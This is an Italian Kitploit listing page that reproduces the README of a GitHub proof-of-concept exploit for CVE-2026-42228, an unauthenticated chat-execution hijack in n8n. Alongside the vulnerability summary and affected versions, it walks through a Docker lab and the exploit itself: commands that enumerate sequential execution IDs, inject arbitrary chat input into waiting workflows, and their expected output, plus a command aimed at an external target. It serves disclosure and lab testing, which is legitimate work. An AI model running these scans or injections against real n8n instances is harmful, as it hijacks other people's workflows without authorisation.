Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-42228 — Proof-of-concept exploit per CVE-2026-42228, una vulnerabilità di hijacking dell'esecuzione della chat non autenticata in n8n, con script automatizzati di scansione e attacco. | Kitploit
Strumenti/GitHubGitHub/rudsarkar/cve-2026-42228
RicognizioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubrudsarkar/cve-2026-42228

CVE-2026-42228

Proof-of-concept exploit per CVE-2026-42228, una vulnerabilità di hijacking dell'esecuzione della chat non autenticata in n8n, con script automatizzati di scansione e attacco.

Vedi Repository
3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

GHSA-f77h-j2v7-g6mw — Dirottamento dell'esecuzione della chat non autenticata in n8n

CVE: CVE-2026-42228
Gravità: Alta
Versioni interessate: n8n < 1.123.32
Corretta in: n8n 1.123.32 / 2.17.4 / 2.18.1


Riepilogo della vulnerabilità

chat-service.ts :: startSession() accetta un executionId dalla stringa di query del WebSocket e verifica solo che l'esecuzione esista nel database. Non verifica mai che il chiamante sia autorizzato ad accedere a tale esecuzione.

Un attaccante non autenticato che conosce (o può enumerare) un ID di esecuzione numerico valido per un'esecuzione nello stato waiting può:

  1. Connettersi al WebSocket /chat senza credenziali.
  2. Ricevere il prompt in sospeso mostrato a un utente legittimo.
  3. Iniettare input di chat arbitrario che riprende — e dirotta — il workflow.

Prerequisiti:

  • Un workflow Hosted Chat pubblico con Autenticazione = Nessuna è attivo.
  • Almeno un'esecuzione è attualmente nello stato waiting.
  • L'attaccante può indovinare o enumerare l'ID di esecuzione numerico (interi sequenziali).

Configurazione del laboratorio

Requisiti

  • Docker ≥ 24 con Compose v2
  • Porta 5678 libera su localhost

Configurazione con un comando

root@kitploit:~
chmod +x exploit.sh
./exploit.sh setup

Questo scarica n8nio/n8n:1.123.22 (ultima release interessata), crea l'immagine dell'attaccante e avvia il target vulnerabile su http://localhost:5678.


Procedura di sfruttamento end-to-end

1. Configurare il target vulnerabile

  1. Apri http://localhost:5678 e completa la procedura guidata di configurazione (qualsiasi credenziale).
  2. Crea un nuovo workflow.
  3. Aggiungi un nodo Chat Trigger → imposta Autenticazione = Nessuna.
  4. Aggiungi un nodo Wait (o qualsiasi nodo che si metta in pausa per l'input dell'utente) dopo il trigger.
  5. Attiva il workflow.

2. Attivare un'esecuzione in attesa

Apri l'URL Chat pubblico mostrato nel nodo Chat Trigger e invia un messaggio. L'esecuzione entrerà nello stato waiting, in pausa in attesa della prossima risposta in chat.

3. Scansione per esecuzioni in attesa (non autenticata)

root@kitploit:~
./exploit.sh scan
# oppure specifica un intervallo:
./exploit.sh scan 1 500

Output previsto quando viene trovata un'esecuzione vulnerabile:

root@kitploit:~
[+] WAITING execution found! exec_id=7
    Server said: 'n8n|continue'
    Server said: '{"action":"sendMessage","sessionId":"...","chatInput":"Hello"}'
    [!!!] Hijack payload sent: '[CVE-2026-42228] hijacked by PoC'

4. Attaccare direttamente un ID di esecuzione noto

root@kitploit:~
./exploit.sh attack 7
# oppure con un payload personalizzato:
./exploit.sh attack 7 "custom injected message"

5. Osservare il dirottamento

Tornando nell'editor di n8n, il workflow riprende con il messaggio iniettato dall'attaccante invece dell'input dell'utente legittimo.


Comandi Docker manuali

root@kitploit:~
# Crea l'immagine dell'attaccante
docker build -t n8n-chat-hijack-poc .

# Scansione (si collega alla rete di laboratorio condivisa)
docker run --rm --network ghsa-f77h-j2v7-g6mw_lab \
    n8n-chat-hijack-poc \
    --target http://n8n-vuln:5678 \
    --start-id 1 --end-id 200

# Attacca un'esecuzione specifica
docker run --rm --network ghsa-f77h-j2v7-g6mw_lab \
    n8n-chat-hijack-poc \
    --target http://n8n-vuln:5678 \
    --exec-id 7 --inject "PWNED"

# Contro un target esterno (nessun flag di rete necessario)
docker run --rm n8n-chat-hijack-poc \
    --target https://n8n.example.com \
    --exec-id 42 --inject "PWNED"

Pulizia

root@kitploit:~
./exploit.sh clean

Ferma i container e rimuove i volumi (incluso il database SQLite).


File

FileDescrizione
poc_GHSA-f77h-j2v7-g6mw.pyPoC Python autonomo
Dockerfile

Riferimenti

  • GHSA-f77h-j2v7-g6mw
  • Changelog della release 1.123.32 di n8n
Scarica lo strumento
Immagine del container dell'attaccante
docker-compose.ymlLaboratorio completo: n8n vulnerabile + attaccante
exploit.shScript di supporto per operazioni comuni